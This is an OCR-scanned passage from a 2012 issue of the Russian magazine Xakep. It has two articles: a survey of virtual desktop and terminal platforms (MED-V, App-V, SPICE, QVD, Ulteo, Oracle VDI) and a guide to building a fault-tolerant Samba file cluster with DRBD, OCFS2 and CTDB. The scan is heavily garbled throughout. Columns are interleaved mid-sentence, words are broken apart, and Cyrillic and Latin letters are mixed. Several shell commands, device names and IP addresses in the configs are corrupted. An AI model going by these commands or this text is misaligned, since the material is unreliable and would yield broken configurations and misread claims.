РС. При этом nользователь даже н е за метит << п одмены >>, - в место о к на
возможностями MED-V, необ хо димо ус тановить MDOP (Desktop Optimization Pack, пакет со д ерж ит еще ряд поле з ны х решений) . Если с истем, требующих MED-V, очень много , понадобится р аз вертывани е специального сервера у правления , х отя MED-V 2.0 и App-V инт е грир у ются с System Center Coпfiguration Manageг.
виртуальной машины о н будет работать с <<обычным>> приложени ем, за пу скае мым через меню << Пуск >>.
Тех н о л о г и я Ар р- V (М i с rosoft Ар р 1i cati оn Vi г tu а 1i z а t i оn 1да е т воз м о ж н ость пр еоб разовать обычные приложения в вир т уальные, причем
не у даляя его фи зи че ски.
Данные те хно логии н е дост у пны для Win7 Home / Starter и не в хо дят в стандартную поставку. Чтобы воспользоваться
пользователю не нужно их п еред этим устанавлива т ь и настраивать.
ХАКЕР
04/159/2012
119
www.epidemz.net
SYN/ACK
мыши на виртуальной машине-> Clone >> l и немного изменить на
SPICE
ПОЗВОЛЯЕТ ПРОБРАСЫВАТЬ
стройки каждой из них. Само собой разумеется, что при количестве клиентов, превышающем
10-15,
одним сервером не обойтись,
nоэтому в viгt-manageг есть возможность управления виртуаль
ПО СЕТИ НЕ ТОЛЬКО ИЗОБРА
ными машинами на нескольких серверах [<<Файл
-
-1
Добавить
соединение>>].
ЖЕНИЕ РАБОЧЕГО СТОЛА, НО И
УСТРОЙСТВА ВВОДА, USВ ~ ПОРТЫ,
Проект QVD [Quality Viгtual Desktop, thegvd .com ] nредставляет
собой масштабируемое, эффективное и nростое в управлении
АУДИОПОТОК
VDI
с открытым исходным кодом, nостроенное на базе GNU/Linux и по зво ляющее запускать
VM
с одного или нескольких образов ОС на
одном узле. Основным направлением развития проекта является и пароль. Если был установлен драйвер
обеспечение дост упа к
«Видео>> и в поле <<Модель>> выбираем
лей и минимизация потребления ресурсов для каждой сессии. Ша
на готова к удаленному подключению
qxl, переходим в раздел qxl. Все , виртуальная маши по протоколу Spice. Теперь
VDI
как можно большего числа nользовате
блонный образ ОС может быть использован несколькими
что
VDI,
нужно настроить тонкие клиенты так, чтобы они автоматически
позволяет стандартизировать рабочую среду и уnростить уnрав
цеплялись к Spice-cepвepy после загрузки. Для этого устанавли
ление. Состояние VD записывается в отдельный образ [oveгlays],
ваем на клиенты любой
который по окончании работы может уничтожаться [no умолчанию]
Linux
дистрибутив, содержащий Х-сервер
из коробки. После установки создаем беспарольного пользователя
или сохраняться. Во втором варианте nри следующем подключе
с любым именем и прописываем ему в автозагрузку следующую
нии клиент сразу продолжит работу с того же места. В настоящее
команду:
время проект предлагает клиенты для
Windows
и
Linux,
на подходе
версия для Andгo i d.
spicec -f -h
адрес_сервера
-р н омер_n орта
-w
В настоящее время
nараль
QVD
считается надежной и безоnасной сре
дой и используется во многих организациях, в том числе благодаря
Ее можно поместить либо в файл -/.xsession пользователя ,
быстрой окупаемости вложений [Retuгn on lnvestment, ROI]. Напри
сразу после слова <<ехес>>, либо в скрипт внутри каталога - /.config/
мер, е го выбрал крупнейший банк Мексики
autostaгt, чтобы его подхватывала среда рабочего стола. В любом
Основой QVD является технология KVM [Keгnel Viгtual Machine],
BBVA
Bancomeг.
случае послелогинаnользователя будет стартовать Sрiсе-клиент
клиент для доступа использует протокол
на nолный экран и устанавливать соединение с виртуальн ой
за щищенное и стабильное соединение при низкоскоростных под
машиной. Чтобы nользователю не приходилось два раза входить
ключениях. Авторизация пользователя возможна средствами
[сначала в реальную машину, затем- в виртуальную], лучше на
обеспечивающий
NX,
LDAP.
Функционально система состоит из трех компонентов: одного
или нескольких QVD-cepвepoв, сервера управления и сервера
строить автологин.
Для каждого терминала можно создать собственную виртуаль ную машину, указывая разные порты и парали
Spice
P ostgгe SQL. Чтобы обеспечить максимальную производитель-
в настр ойках.
ность и масштабируемость, они должны располагаться на разных
Сделать это с помощью viгt-manageг очень просто. Достаточн о
машинах. Разработчиками сообщается, что
создать нужное число клонов виртуальной машины [<<правый клик
предприятии для обслуживания более
Storaqe "'
QEMU VM
Графика
N•twork
lnput
Guest
Укажите настройки nро с мотра виртуа11ьного жрана. Iиn:
qxl driver
1
1
standaгd
guest dгivers
1
·1
Sp1ce server
Sound
1
QVD был развернут на 35 000 пользователей и обра-
Tlpr VNC or Splce server ls strono~ recommended bec"u se lt
Serial
ellowsthe\(jгtueldlspliiiYtobeembeddedln.s l dethlsoppllcetJon. lt
Parallel
ml)'elsobe usedto aHow rtmotesystem.
Channel USB Host Devic e PCI Host DevJCe
Video
tccesstotheviгtulll
dlspleyfrome
Адр2с: О Прослуwивап. все общедостуnные сетевые интерфейсы
Qорт : !s900
j·j !LS port : js901j:j
О А§.томати'iеское на:~на'iение
Пароаь :
fаскладка :
0
Как на хосте
gругая :
user's machine
М еха н изм до с ту п а
Spi ce
ХАКЕР
120
www.epidemz.net
04/159/2012
Новая э ра терминальных систем
•О настройке
ULTEO OPEN VIRTUAL DESKTOP (OVD)
сервера терминалов
в
Win2k8 09.08;
чит ай в][
•по дробне е о Нурег
Платформа OVD lulteo.coml от Га эля Дюваля, создателя
данными идет по RDP ITCP/3389 1. В текущей редакции
Mandгake/Mandгiva Linux, nозволяет организовать достуn
пользователь может без проблем воспроизводить аудио-
nри nомощи В'еб-браузера или специального клиента
и видеофайлы из домашни х каталогов, размещенных на
к рабочим столам или отдельным приложениям на базе
удаленных системах . Поддерживается более двадцати
Liпux или
языков, в том числе и рус с кий. Серв ерная часть платформы
Windows . При этом пользователь подключается
к своему рабочему месту с любого ПК, на котором установлен браузер с
Java
пл аги н о м. Решение совместимо с некоторыми
облачными системами вроде
найдешь обзор VMwaгe
на Ubuntu 10.04 LTS, RHEL 5.5[неофициально CentOS и Fe-
с ерв е ра приложений, файлового сервера и шлюза. Первые
базе
динамический/ виртуальный IР-адр ес каждому сеанс у или
Ubuntu. Сегодня Ulteo активно развивается и зарекомендовал
два являются основными. Аутентификация пользователя
nриложению , что
решает проблему привязки к IP;
себя стабильным продуктом, используется в гассекторе
новой ветки
3.0 . Для
View 4.5; Win 2k8 R2 RDS
•в
умеет назначать
приложенийl . Доступен и уста но вочный DVD, построенный на
RC8
виртуальность»,][
02.09; •в ][ 11.10ты
поддерживает установку [через специальный репозиторийl
с остоит из нескольких компонентов : менеджера сессий ,
во з можна средствами LDAP/AD и CAS.
в статье
«Гиперактив на я
doгal, Novell SLES 11 SP1, Win2k3/2k8/R2 [только сер вер
Amazon ЕС2. Структурно OVD
В настоящее время доступен
V читай
•технологии VDI не
и образова нии, небольши х и с редни х пр е дприятия х, а также
организации подключения к удаленным рабочим столам
некоторыми хостин говыми ком паниями , предоставляющими
и с пользуется защищенный протокол HTTPS/443, обмен
услуги удаленного доступа.
TS/RDS
и
взаимоисключают,
а ДОПОЛНЯЮТ друг друга ;
• в настоящее время QVD используется в крупнейшем банке Мексики BBVA Bancom er.
ORACLEVDI Те х нология, являющаяся частью Огасlе Viгtualizatioп- набора
защиты [на локальной машине не сохра ня ется никакая
с ред с тв виртуализации, который призван покрывать все
лишняя информация-
потребности организаций от терминалов [вроде Sun Rayl до ЦОД
К слову, менеджер админис триров ания
ISun Fiгe, Sun Stoгagel. Огасlе VDI пред став ля ет собой менеджер
на
cookie, кэш, авторизация и так далее] . VDI также написан собой веб-приложение. Режим <<kiosk
сессий- соппесtiоп Ьгоkег- обеспечивающий подключение
Java и представляет mode >> позволяет работать
клиентов к виртуальным рабочим местам по пр отоколам
режиме без возможности доступа к самой ОС. Те хнология
RDP или SGD IOгacle Secuгe Global Desktopl . В качестве
Аг г а у
автоматиче с ки переключает соединени е н а с ледующий
ViгtuaiBox , VMwaгe vSpheгe, Нурег-V, а также отдельные ПК,
сервер в массиве. Пользователи могут им е ть переанальные
предоставляющие доступ по
десктопы или работать с пулом, подключ а ть с менные носители ,
Приложения могут работать
под управлением любой популярной ОС
[Windows , Solaгis ,
и VDI: clck . гJ!LWddP; •caйтQVD:
~-
с прило же ни ем в полноэкранном
виртуальных машин [Viгtua li zatioп Layeгl могут выступать
RDP.
•Набор руководств от Microsoft по развертыванию RDS
Resilience в случае не доступности ос новного сервера
Для возможности удаленного подключения к сессии клиентов
н еобхо димо в ветке реестра
воспроизводить качественное видео и аудио , получить
Liпux, *пiх и др]. В случае выбора SGD пользователь запускает
32-битный цвет и так далее . Индивидуальные параметры
в браузере специальный веб-клиент, обеспечивающий доступ
подключений можно хранить в атрибутах AD/LDAP. В качес т ве
к д ан ным с любого устройства [браузер, поддерживающий
базовой платформы исполь з у е тся So l aгis или Огасlе Епtегргisе
Java[RR1]J, шифрование сеанса и допол нитель ный уровень
Linux [клон RHELI.
HKEY_LOCAL_
M ACНINE \SYSTEM\Cur
rentControlSet\Con trol \TerminalServer установ ить значение
nараметра
moteRPC
AllowRe -
в н 1~>.
ботки д о 9 000 од н о вр е м е н ных сесс ий , прич ем ус п е шн о с пр авл ялся
После об н овлени я в с п иске появи т с я н еск олько па к е т о в
с р а бо т о й. С е р вер у прав ления обес п е чив ае т п о дкл ю ч е ни е к ли ен т ов,
уnро щ ения изучени я разработчик и пр е дл агают с пе ц иаль н ы й м е т а
за п ус к ну жной
паке т, устанавливающий в с е компо ненты на од ин сер вер :
VM и по лучен и е ви рт у альног о IP. Со с т о ит и з трех
qvd-*- Дл я
ко мп о н е нтов :' броке ра с оед инений L7R , д е мона HKD [Hous e Kee ping
Dae monl, отве чаю щ е го за п у ск/остан ов VM и связь с БД, и Node -эле м ента управле н ия L7R и HKD . Д ля хра н ения данных исполь
$ sudo apt- get inst al l \ qvd- demo- sing l e- in sta nce- no suppo rt qvd - admin
з уе т с я любой NAS/SA N ресурс. Управле н ие и монитори н г рабо т ы производятся при помощи веб-интерфейса QV D Web Administгation Tool [WAT, написан на Регl Catalyst l или из ко н соли [qvd-admiп l . Д осту п но н ескол ь ко ве р сий QVD- свобо д н ы й Community, плат ный Commeгcial и сервис Clo ud [ н а хостин г е QVD] . С р авнение их
Теперь можно подключаться к WAT, который по умолчанию рабо
функц и она льн ост и мо ж н о н а й т и на сайте.
л агают неско льк о в а р и ан т ов, в т о м ч и сле и индив и ду а льные]. Вс е
П роект п р е д остав л яе т репозиторий па кетов для Ub untu 10.04
LTS и SL ES, а также де м ообразы для виртуальных машин [на базе Ubuntu 10.10 ]. Н о разработч и ки отме ч ают, ч т о уста н овить QVD при помощи исходных текстов мо жн о на л юбом Linux. В Ubuntu 10.04 LTS п р оцесс выгл яди т д оволь н о просто, вна ча ле сле д уе т добавить информаци ю о но в ом ре п ози т ор ии :
та е т на 3000 порту, и приступать к настройкам. Чтобы упростить установку, из по ст авк и уб р ан ы все о б ра з ы О С , п оэ т о му и х п р и
дется << готовить>> самостояте л ьно [за п лату разра б о тчик и пр е д образ ы хра н я т с я в ч е т ырех п о дк а та логах /vaг/li Ь/qv d /sto гa ge [е г о обычно монтируют чере з NFS]: homes [qcow2 изображения поль зовательско г о / home l, i mages [О С] , oveгl a ys [вре м ен ны е фа й лы] и stagiпg.
ЗАКЛЮЧЕНИЕ Как ты мо г убе д и т ься, идея терминалов и единого вычисл и тельного
$ s udo apt- add -re pos ito r y \
центра продолжает жить и процветать, заставляя программ истов
'deb http: // theq v d.com/ debi an lucid main' $ sud o apt- get updat e
и админов выдумывать все более изощ р енные методы связи, удо
ХАКЕР
влетворяющие потребнос т ям сего д ня ш него дня.
04/159/ 201 2
I
121
www.epidemz.net
SYN/ACK
Евгений Зо бнин izobninlagmail.coml
НЕИЗМЕННО ВЫСОКАЯ
н РАЗВОРАЧИВАЕМ
Каждая организация в той или иной мере
ОТКАЗОУСТОЙЧИВЫЙ СЕРВИС ХРАНЕНИЯ ДАННЫХ НА БАЗЕ
SAMBA
ь
нуждается в быстром и надежном сервисе хра нения данных. В большинстве слу ча ев эта за дача решается с помощью покупки разного
рода оборудования, реализующего
NAS, однако
создать высокопроизводительный и устойчивый к сбоям файловый сервис можно и на базе парочки стареньких серверов, оснащенны х до стато чно емкими дисками.
122
ХАКЕР 04/159/2012
www.epidemz.net
Н еизме нн о высо к а я д ос т у пн ос т ь
o !J= •
о «>nfigцring
о
о
о
w\kJ.samЬ ...org
J<>Jing
· ~
c tdb
huiliJing
С
· ~
sоп-.Ьо
dщume n tatjon
!wg,Jrocking
page
S 'AmBA
d1scuss1on
hislory
CTDB Project Conte nts [hlde)
Welcome to the CTDB web pages
1 CTDB Project 1 1 ProJect Members
CTDB is а c\uster implementation ofthe TDB database шеd Ьу Samba !nd otbe,pгojects to stшe temporary data. J faп application is a\ready using ТDВ for temporaty data it is very easy to convert that applicatioп to Ье c\uster a\vare and use CTDB
navigatlon
1 2 Settlng Up CTDB
• Maln page
1.3 Status Updates
• Communtty porta!
•
instead.
Curтent
1 4 Projecl Outltne
events
2 ProJecl Tasks
• Recent changes
2.1 Hardware acceleration 2.1. 1 The basic features we want from
• Random page
CTDB
pгovides
pi"ovidiпg а
the same types offtщctioпs as TDB but in а c\ustet·ed fasltion , ffiB-style database ti1Зt spaпs multiple pl1ys icallюsts in а clustet·.
• Help
а
messaging API are:
2.1 2 TODOs regardmg this interface
22 CTDB API
search
2 3 Code s3/s4 databases ontop of ctdb api
Fearut·es inclttde: Go
• CTDB provides а TDB tl1at has consi s teпt data and consistent locking across all nodes in а clttster. о СТDВ is very fast. • In case ofпode failнгes, CTDB \vi\1 automatical1y recover апd repait· al\ ТDВ databases tlшt it maпages. С т р а ни ч ки, посвященные проекту
2.4 Code cltent CTDB api оп top of dumb tdb
Search
2 5 Prototype CTDB library on top of
toolbox
СТОВ
• What lmks here
2.7 Code
• Related changes
2 В Recovery
• Speciэl pages
2 9 IP Takeover
•
Prtn taЫe
UDPIТCP
2.6 Setup slandalone test envtronment
version
test suite
2 .10 Work out details for persistent tdbs
CTDB
I:J:Ii!I§ЩI!i
Итого для настройки высоконадежного файлово г о сервиса
В этой статье мы рассмот р им процесс создания высоконадежно го файлового хранилища, реализованного на безе двух типичных
Samba нам необходимо следующее. 1. Обзавестись двумя серверами, в каждом
серверов, операцион н ой сис т емы GNU/ Linux и сервера Samba. Мы создадим небольшой, но устойчивый к сбоям кластер: вы ход одного из узлов из строя никак не повлияет на достуnность данных.
..,.,,,61 В обычной ситуации файловый сервис на основе
Samba
2. 3. 4. 5.
Linux
Настроитьсетевой
RAID1
между ними.
Поднять параллельн у ю ФС на RА101-массиве. Установить и настроить на каждом узле Поднять
CTDB для демонами Samba.
Samba.
расшаривания данных о состоянии между
выглядит Такой вот многослойный nирог, приготовлением которого мы и
как машина, оснащенная достаточно емким жестким диском, на
которую установлен дистрибутив
из которых установлено
два диска и две сетевые карты.
и nакет nрограмм
Samba ,
отвечающих за обслуживание клиентских заnросов на достуn к ресурсам. И зъян такой конфи г урации в том, что выход из строя
займемся nрямо се й час.
НАСТРОЙКА ХРАНИЛИЩА
жесткого диска моментально обруши т весь сервис и оставит кли
Итак, у нас есть два сервера, каждый из которых осна щ ен д вумя
ентов без хранилища дан н ых.
жесткими дисками. На / dev/sda стоит операцион н ая система
Понятно, что для решения этой nроблемы следует в обяза
! я буду использовать Debian), / dev/sdb отведен для хранения
тельном порядке применять RА1 0 1 - массив, который позволит
данных
сохранить данные и работоспособность сервиса, даже если один из
конфигурация будет менее nроизведительной и удоб н ой в сопро
дисков умрет. Это типи чн ая конфигурация, которая, тем не менее,
вождении.
Чтобы избежать и этой ситуа ц ии, можно собрать мини-кластер
Можно исnользовать и один диск, но такая
Наша первоочередная задача- объединить жест к ие диски
не спасет от смерти са м ого се рв ера или одной из его железяк. В этом случае данные все равно окажутся недоступны.
Samba.
двух машин в массив
RA ID1.
щью драйвера
и кроссовер-кабеля, соединяющего серверы
DRBD
Сделать это по сети можно с nомо
из нескольких машин, данные с жестких дисков ко т орых будут
напрямую через одну из двух сетевых карт. Это позволит создать
зеркалироваться по сети с nомощью драйвера
мост для быстрого обмена данными между машинами, в то время
DRB D и
сnециаль
ной nараллельной файловой системы. Н о и здесь есть загвоздка:
как клиенты будут получать доступ к кластеру с помо щ ью д ру г ого,
если мы n рос т о установ и м на оба этих узла
внешнего сетевого интерфейса.
Samba,
то легко nо
Чтобы не путаться, сразу оnределимся, что
лучим несогласованность файловой системы, видимой удаленным
Для отображения семантики файловой системы
UN IX в CIFS Samba ис n ользуе т легковесные базы данных, называем ы е TD B, которые содержат такие данные как таблица соответствия Windows 510 и Unix UID/G ID, дан н ые и nоддержки своего состояния
Samba
и
10.0.0.2
щью кроссовер - кабеля, а
будут работать с одним общим хранилищем, но
иметь разные таблицы
TDB,
192.168.0.1
и
192.168.0.2 -
это внешние
адреса , по которым будет происходить обмен сервисными данными
и которые будут видны клиентам !на самом деле все несколько сложнее, но об э т ом позже).
об о т крытых сессиях, таб л ицу блокировок и так далее. Если два экземпляра
10.0.0.1
- это внутренние IР-адреса, объединяющие серверы с помо-
nользователям.
После настройки IР-адресов выполняем на каждой машине следующую команду:
это nриведет к весьма печальным по
#
следствиям с первых же минут заnуска сервиса.
apt-get i nsta ll drbd8-utils
Но и этой проблемы можно избежать, восnользовавшись демо
ном CTD B !Ciusteг TDBI, который будет храни т ь еди н ую базу д ан н ых для нескольких экземпляров
Samba
и с л едить за ее соответств и ем
реальному положению дел. В качестве бонуса
CTDB также будет
выполнять функции мониторинга и автоматического отключения
нерабочих узлов от кластера, что избавит нас от необходимости ис пользования сторонних инструментов.
ХАКЕР
Далее на одной из машин создаем файл /etc/drbd.conf и пишем в него следующее:
# vi /etc / dr bd . conf globa l { usage-co unt no; } commo n { sy nce r { rate 100М ; } }
123
04/159/2012
www.epidemz.net
SYN/ACK
s
s
ТСР / 1
TCP/IP
NI C
Как работает
DRBD
resource r0 { protocol С; startup { wfc-timeout 15 ; degr-wfc-timeout 60 ;
device /dev/drbd0; disk /dev/sdb ; address 10.0 . 0 . 2 :7788 ; meta-disk internal;
net Настройки двухголовой конфигурации (primary/ primary) allow-two-pr imaries; after-sb- 0pri discard-zero-changes; after-sb- 1pri co nsensus; after-sb- 2pri disconnect;
Главное здесь- это nа роль, используемый для доступа к
#
массиву, а также два последних блока, описывающих диски
массива. Они могут иметь произвольные имена, однако поля должны содержать актуальные данные для каждого из хостов.
Опция
«disk>>
задает блочное устройство, которое станет частью
# Пароль и метод шифрования
массива, опция «addгess>>- внутренний IР-адрес узла и порт
shared-secret "ПАРОЛЬ" ; cram-h mac-alg s ha1;
ном виде.
DRDB.
Файл необходимо скопировать на второй узел в неизмен
Теперь инициализируем массив, выполнив на обоих узлах
# П\'РВЫЙ узел
команду:
on node1 { device /dev/drbd0; disk /dev/sdb; address 10 . 0 . 0.1 :7788 ; meta-disk internal;
#
Далее стартуем сервис dгbd [опять же на обоих узлах]:
# #
drbdadm create-md r0
/etc/in it.d /drbd start
Второй узел
on node2 {
На одном из узлов выполняем следующую команду, которая
сделает оба узла главными, то есть позволит монтировать DRВD девайс с обеих н од:
СОБИРАЕМ МИНИ-КЛАСТЕР ИЗ
#
drbdsetup /dev/drbd0 primary
-о
После этого должна начаться синхронизация, за ходом которой
НЕСКОЛЬКИХ МАШИН, ДАННЫЕ С
можно следить, читая файл /ргос/dгЬd:
ЖЕСТКИХ ДИСКОВ КОТОРЫХ БУДУТ
#
ЗЕРКАЛИРОВАТЬСЯ ПО СЕТИ
cat /proc/drbd После окончания синхронизации на массиве можно создать
12~
ХАКЕР
www.epidemz.net
04/159/2012
Н е и з м е нн о в ы со кая до с т у пн ос ть
Далее ФС можно смонтировать [здесь и далее я буду испол ь зо
файловую систему. Ст андартная ФС не подойдет, так как не сможет обеспечить соответствие мета д анных nри о д новременном доступе
вать каталог
к ФС с разных узлов. П оэтому нам нужна параллельная файловая
Samba/:
/samba
в качестве точки монтирования и корня для
система [ т акже называемая кластерной/, на роль ко т орой отлично nодойдет
OC F52 от Огас l е [хотя можно использовать и любую дру GF52/. OCFS2 есть в ядре, поэтому все, что требуется установить,
гую, например Код
# # #
mkd ir /sa mba ec ho "/dev/ drbde /sa mba ocf s2 no at ime mou nt / dev/d rbde
е е·
>> /et c/f st ab
это утилиты у~равления:
Сделать это необходимо на обоих узлах . Чтобы избежать воз
#
можных nроблем в будущем, проверь работоспособнос т ь кластера
apt-get in sta ll ocfs2- t ools
и корректность настроек с помощью копирования ф айлов и ката
Конфи г файловой системы хранится в /etc/ocfs2/clusteг.conf. В нашей ко н фигурации он должен иметь nример н о следующий
логов в файловую систему. При правильной настройке содержимое ФС должно выглядеть идентично на обоих узлах.
вид:
ЗАПУСК
SAMBA
Если в работе файловой системы не возникает проблем, то можно
vi / etc / ocfs2/cluster.conf cluster : node_cou nt = 2 name = ocfs2
#
переходить к установке и настройке
Samba.
Главное здесь, как я
уже говорил, демон СТDВ, nоэтому мы остановимся на очень про стом конфиге
Samba,
а ее кластерную составляющую расс м отр и м
более подробно.
node :
Итак, наш конфиг
ip_port = 7777 ip_ad dr ess = 1 92. 1 68.е. 1 nu mber = 1 name = node1 . cl us ter. l oca l clu st er = ocfs 2
Samba
будет выглядеть примерно так:
[global] clustering = yes idmap bac kend = t db 2 private dir=/samba/ctdb fileid:mapping = fsid vfs objects = fileid
node : i p_port = 7777 i p_addr ess = 1 92 . 168 . е .2 number = 2 name = nod e2. clu st e r . l oc al clu ste r = ocf s2
[ p uЬlic]
Этот конфиг описывает класте р с именем
ocfs2
и двумя н одами:
comment = puЫic share path = /sa m ba/puЬlic puЫic = yes writeaЬle = yes only guest = yes
node1.clusteг.local и node2.cl u s t e г. local. И мена н о д должны совпадать
Это простейший пример файла
с именами хостов, поэтому необходим о за р анее позаботиться о при
вязке имен хостов к IР -а д ресам в файле
/etc/hosts обоих узлов.
Имя
кластера меня т ь не стоит, так как загрузочные с крипты п о умолчанию
будут инициализировать клас т ер
<<ocfs2»
и не смогут завершить этот
/etc/samba/smb.co nf с о дн о й п у /samba/ct db для хра
бличной <<шарой», а также приватным каталогом нения данных демона
CTDB. Фактически, только
первые три строки
необходимы для работы самбы в кластерном варианте, остальное
процесс, если имя будет другим . О брати внимание, что в этот раз мы
nросто оптимизация для работы с
используем вн ешние I Р- а д реса .
Каталоги, естественно, необходимо создать заранее:
OCFS2
и описание сете в ого диска.
Копируем конфиг на оба узла и заnускаем службу о2сЬ:
#
# # #
/et c/ init . d/o2cb sta rt
mkdi r /sa mba /c t db mkdir /sam b a/ pu Ыic ch mod 777 /sa m ba/puЬlic
Теперь можно создать файловую систему на DRВО-устройстве.
Сделать это можно с любого узла:
#
Инициализируем базу па ролей:
mk fs .ocfs2 - L "ocfs 2" / dev / dr bde
#
Производительность Рез ульт а т т еста
NB ENCH CIFS для малого
Узлы
кпа с тера из четыре х узлов
(lntel dua l-core IBM HS2 1) и не б ольшо й с и с темы х ранения
GPFS
1 2 3 4
до
CTDB (MB/s)
95 .0 2.1 1.8 1.8
с
CTDB (MB/s)
109 210 278 308
Производительность С ТОВ- к ластера раст е т nроnорционально к олич е с т в у уз ло в
ХАКЕР
-а
root
> ct db s tatus
<?_se,;:
на о с нове
smbpasswd
Numbe r of nodes :2 pnn :0 192 .168,0,1 ОК (THIS NODE ) pn n : 1 192 , 168 ,0 ,2 ОК Generation : 1362679229 Size :2 hash :0 lmaster :0 hash : 1 lmaster : 1 Reco very mode :NORHRL (0 ) Reco ver y master :0 П рове р я е м состоя ни е к ласт е р а
125
04/159/2012
www.epidemz.net
SYN/ACK
Далее устанавливаем самбу на оба узла и копируем на них вышеприведенный конфиг. В качестве окончательного штриха
устанавливаем и настраиваем CTDB на обоих узлах:
# apt-get
iп sta ll
ct db
Сам демон не имеет конфигурационного файла, н о, тем не
pnn:1 192.1 68 .0 .2 ОК Ge nera ti o n : 1362679229 Size:2 has h:0 lma ste r :0 has h : 1 lma ste r : 1 Recove ry mode :NORMA L (0) Recovery ma st er :0
менее, требует настройки с помощью скриптое инициализации
и закрепленных за ними конфигов. В Fedoгa/RedHat это /etc/ syscoпfig/ctdb, в Debiaп/Ubuпtu - /etc/default/ctdb. Файл необходи
Также для проверкисоединения можно устроить пинг СТОВ хостов:
мо отредактировать на обоих узлах:
#
Местонахождение lосk-файла мастера
восстановления
CТ DB_RECOV ERY_L OCK; " / samba /c tdb / lock"
# Публичный сетевой интерфейс, # обмена данными CTDB_PU BLIC_I NTERF ACE ; eth 0
#
Список адресов,
# ctdb pi ng -n al l res p oпse from 0 t i me;0,000064 sec response from 1 time;0.000087 sec
(3 cl ien ts) (9 c l ients)
используемый для
Наконец запускаем демон Samba:
по которым будет доступен кластер
# /etc/in i t. d/sa mb a start
C TDB _PUBLIC_ADDRESSES ;/e tc /ct d b/ puЬl ic_a d dresses
# Перекладываем работу CTDB_MANAGE S_SAMBA;yes
по запуску
Samba
на
CTDB
Если при конфигурировании не было до п ущено ошибок, кла стер уже должен быть готов к подключению клиентов. Со стороны Windоws-клиентов кластер должен выгляде т ь как единое целое, то
# Список СТОВ-узлов CTDB_NOD ES;/etc/ctd b/nodes
есть как один сервер хранения . В большинстве сред рабочего сто ла для UNIX картина будет та же. Однако если потребуется смон
# Куда писать логи CTDB_ LOG FI LE;/va r / l og/log . ctdb
тировать «диск>> из командной строки, придется указать один из
публичных IР-адресов, прописанных в /etc/ctdb/puЫic_addгesses: Далее создаем файл /etc/ctdЬ/пodes и добавляем в него IР адреса узлов Samba, то есть наши два сервера:
# mount -t ci fs /mпt/sam b a
# smbcl i ent
192. 168.0. 1/2 4 192. 168.0.2/24
//192. 1 68 . 0.3/ pu Ы i c -о
user;IOЗ EP
// 1 92. 1 68 . 0 .4 /p uЬlic
Не важно, какой из адресов использова ть , - как я уже говорил,
Также создаем файл /etc/ctdЬ/puЫic_addгesses с еще двумя
они оба будут доступны ровно до тех пор, пок а в строю будет на
IР-адресами:
ходиться хотя бы один сервер.
192. 168.0.3/24 192. 168 .0.4/ 24
Просто собрать кластер - только начало, гораз д о труднее зани
МОНИТОРИНГ И ВОССТАНОВЛЕНИЕ маться слежением за его состоя н ием и предотвращать отказы.
Эти адреса должны отличаться от публичных адресов, но на
К счастью, наша конфигурация всячески этому способствует и
ходиться в той же подсе т и. Они будут автоматически назначены
требует вмеша т ельства, как правило, только на уровне реше
узлам кластера в качестве дополнительных IР-адресов, по кото
ния железных проблем,- остальные проблемы будут решены
рым и будет происхо д и т ь по д ключение клиентов. Это нужно для
софтом самостоятельно. Как это работает? П редставим себе
автоматического поддержания работоспособности кластера. Е сли
ситуацию, когда один из узлов кластера выходит из строя. Как
один из узлов выйдет из строя, CTDB автоматически приевсит его
ведет себя система в этом случае? Первым под удар попадает
I Р-адрес другому узлу, и клиенты будут работать, как ни в чем не
наше DRВО-устройство, но благодаря режиму masteг/masteг
бывало.
смерть одного из узлов никак не отразится на функциональ
Этих настроек должно быть достаточно. Запускаем CTDB на
ности другого. П оэтомунедосту п ное устройство просто отклю
обоих узлах:
чается, а второй сервер продолжает функционировать. Второй
# /etc/in i t . d/c tdb start
OCFS2. Но и здесь все заканчивается достаточно благополучно благодаря встроенному механизму фенсинга [fencingl, который
компонент, реагирующий на смерть узла, это файловая система
Если он работает нормально, то команда
<<ctdb status>> вернет
просто отключает недоступную ноду от кластера и восстанав
что-то вроде этого:
ливает консистентность файловой системы с помощью отката
Numb er of nodes :2 pnn:0 192. 168 . 0 . 1
сбойного узла. П ри этом сам сбойный узе л отпра в ляется в пере
незавершенных операций над файлами, проде л анными со ОК
(TНIS
загрузку [если, конечно, он не умер окончательно ! . Следующим о смерти узла узнает демон CTDB, работающий на живо м уз л е.
NODE )
Однако, в отличие от двух предыдущих компонентов пирамиды,
он поступает гораздо умнее. Он помечает мертвый узел флагом
ЧТОБЫ ВОВРЕМЯ РЕАГИРОВАТЬ НА ПАДЕНИЕ УЗЛОВ, СЛЕДУЕТ ПРИМЕНЯТЬ РАЗЛИЧНЫЕ МЕТОДЫМОНИТОРИНГА
UNHEALTHY или DISCONNEC TED, назначает его IР-адрес другому узлу и посылает всем его клиентам Т СР-пакет с нулевым номе ром последовательности. Это вынуждает клиентов переуста новить соединение с узлом, благодаря чему они автоматически перебрасываются на живой узел, даже не заметив подмены. Сам протокол
CIFS позволяет выполнить т акой трюк, в резуль
тате чего задержка в обслуживании для клиентов составляе т
всего несколько секу н д. Ч т о дела т ь в такой си т уа ц ии админу?
126
ХАКЕР
www.epidemz.net
04/159/2012
Н еизме нн о в ы со кая д ос тупн ост ь
•lobal { usage-count no ; } common { s~ncer { rate 100Н; } } resource r0 { protocol С ; startup { wfc-timeout 15; d.egr-wfc-t i meout 50 ;
cluster: Если тебе
node count = 2 name = ocfs2
потребуется собрать кластер из более ч ем дву х машин, можно
использовать любую
node :
net allow-two- primaries; after-sb-0pri discard-zero-changes ; after- sb-1pri consensus ; after-sb-2pri disconnect ; shared-secret "123 "; cram-hmac-alg sha1 ;
распределенную
ip_port = 7777 ip_address = 192.158 .0.1 number = 1 name = node1 .cl uster . local cluster = ocfs2
ФС вроде lustгe и GlusteгFS .
..
Чтобы
Samba
работала правильно , следует
позаботиться
node:
об управлении
ip_port = 7777 ip_address = 192.158 .0 .2 number = 2 name = node2 .cluster. local cluster = ocfs2
on node1 { de vi ce / dev / drbd0 ; disk / dev / sdb ; address 10 .0.0 . 1:7788 ; meta-disk internal ;
учетными записями
пользователей . В официальном руководстве
подробно описано, как это сделать.
on node2 { /etc/dгbd.conf[+][RQ] Правим конфиг
Правим конфиг
DRBD
OCFS2
ma i l f oo@bar -s ""ho stna me· i s UNHEALTHY" . ..
Да в общем-то ничего. Если сервер упал из-за ошибок в ПО или каких - тонепреднамеренных д ействий со стороны третьих лиц
(пропало питание, не сработал UPS и так далее!, то после пере
healthy) mail foo@bar -s ""hostname· i s HEALTHY" ...
загрузки узе л восстановит свое состояние автоматически. То же самое справедли в о и в отно ш ении поломки одного из внутрен
